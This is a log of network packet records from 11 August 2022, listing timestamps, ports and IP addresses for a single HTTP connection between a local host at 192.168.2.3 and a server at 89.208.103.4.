Aug 11, 2022 06:57:10.168066025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.168107986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.168140888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.168147087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.168178082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.168184996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.168219090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.168224096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.168234110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.168262005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.168287039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.168313026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.168529034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.168584108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.169064045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.169101954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.169145107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.169162035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.169183969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.169222116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.169239044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.169276953 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.170552969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.170591116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.170629978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.170667887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.170670033 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.170698881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.170703888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.170742035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.170751095 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.170763016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.170778990 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.170799017 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.170825958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.170839071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.170897007 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.174644947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.174686909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.174726009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.174757004 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.174793005 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.174882889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.174922943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.174988031 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.175031900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175070047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175122976 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.175214052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175390959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175430059 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175446033 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.175467014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175478935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.175506115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175527096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.175543070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175580025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175609112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.175618887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175636053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.175657034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175694942 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175708055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.175731897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175760984 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.175770044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175791979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.175807953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175844908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175857067 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.175883055 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175921917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175932884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.175957918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.175996065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.176012993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.176033020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.176069021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.176094055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.176106930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.176115036 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.176143885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.176182985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.176198006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.176222086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.176259995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.176276922 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.176296949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.176306009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.176388025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.176424026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.176454067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.176547050 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.177056074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.177097082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.177148104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.180799961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.180840969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.180876970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.180903912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.180927992 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.181380987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.181416988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.181447983 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.181479931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.183936119 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.184006929 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.184072018 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.184108019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.184132099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.184145927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.184160948 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.184185028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.184221983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.184238911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.184258938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.184268951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.184297085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.184310913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.184333086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.184349060 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.184370995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.184407949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.184422970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.184447050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.184473991 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.184492111 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.187700033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.187807083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.187846899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.187886000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.187922955 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.187926054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.187962055 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188002110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188050032 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188082933 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188092947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188096046 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188097954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188097954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188122988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188138008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188148975 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188174963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188193083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188211918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188227892 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188250065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188286066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188303947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188323975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188342094 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188361883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188400984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188417912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188438892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188452959 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188474894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188513041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188549995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188558102 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188579082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188616037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188622952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188630104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.188656092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.188673019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.190736055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.190924883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.191039085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.191102982 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.191421986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.191554070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.191611052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.191669941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.191816092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.191867113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.191924095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192070961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192109108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192120075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.192164898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192233086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.192303896 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192341089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192377090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.192380905 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192420959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192457914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192497015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192534924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192534924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.192559958 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.192564964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.192573071 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192610979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192626953 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.192651033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192655087 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.192691088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192729950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192743063 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.192768097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192806005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192810059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.192843914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192847967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.192879915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192893982 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.192918062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192929029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.192955017 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.192991972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193000078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193031073 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193067074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193077087 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193104029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193106890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193141937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193177938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193187952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193214893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193252087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193262100 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193289995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193295956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193329096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193365097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193376064 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193402052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193439007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193448067 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193476915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193515062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193521023 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193552017 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193558931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193589926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193630934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193639040 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193666935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193702936 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193711996 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193742037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193748951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193778038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.193826914 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.193983078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.194020987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.194030046 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.194070101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.194647074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.194686890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.194710970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.194721937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.194725037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.194760084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.194771051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.194814920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.195667028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.195703983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.195758104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.195775986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.195816040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.195852995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.195863962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.195899010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.201303005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.201340914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.201379061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.201415062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.201432943 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.201468945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.201493025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.206351995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206408978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206446886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206484079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206504107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.206521988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206526041 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.206561089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206561089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.206567049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.206600904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206640959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206653118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.206665039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.206679106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206717014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206732035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.206753969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206759930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.206792116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206828117 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206859112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.206866980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206876993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.206906080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206942081 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.206965923 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.206979990 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207000017 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.207016945 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207046986 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.207052946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207072973 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.207091093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207127094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207154036 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.207165956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207170963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.207205057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207241058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207257986 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.207279921 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207290888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.207319021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207329035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.207374096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.207391024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207431078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207468987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207488060 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.207505941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207515001 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.207544088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207581997 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:10.207595110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:10.207621098 CEST	80	49736	89.208.103.4	192.168.2.3
